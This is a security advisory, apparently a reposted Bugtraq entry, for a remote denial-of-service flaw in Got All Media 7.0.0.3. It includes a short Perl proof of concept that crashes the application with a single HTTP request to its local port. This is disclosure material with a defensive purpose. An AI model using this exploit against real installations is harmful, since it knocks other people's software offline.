|
Feeds -
Exploits
|
|
Written by LiquidWorm
|
|
Friday, 20 February 2009 20:10 |
Got All Media URI Handling Remote Denial of Service Vulnerability
-\\Bugtraq ID:
33830
-\\Class:
Unknown
-\\CVE:
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Feb 19 2009 12:00AM
-\\Updated:
Feb 20 2009 06:17PM
-\\Credit:
LiquidWorm <
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
>
-\\Vulnerable:
Got All Media Got All Media 7.0 3
-\\Discussion
Got All Media is prone to a remote denial-of-service vulnerability when processing URI requests.
Exploiting this issue allows remote attackers to cause denial-of-service conditions by crashing the application.
Got All Media 7.0.0.3 is vulnerable; other versions may be affected as well.
-\\Exploit(s)/PoC(s):
An attacker can use a browser to trigger this issue.
A proof of concept is available:
===============================================================
33830.pl
^^^^^^^^^
#!/usr/local/bin/perl
#
# Title: Got All Media 7.0.0.3 Remote Denial Of Service Exploit
# Product web page: http://www.gallm.com/default.aspx
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm [t00t] gmail [w00t] com
# http://www.zeroscience.org
# 19.02.2009
#
print "\n[*] t00ting...\n";
use LWP::Simple;
my $url = 'http://127.0.0.1:5550/t00t';
my $freeze = get $url;
die "Couldn't get $url" unless defined $freeze;
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Home Page
http://www.gallm.com (Got All Media)
|
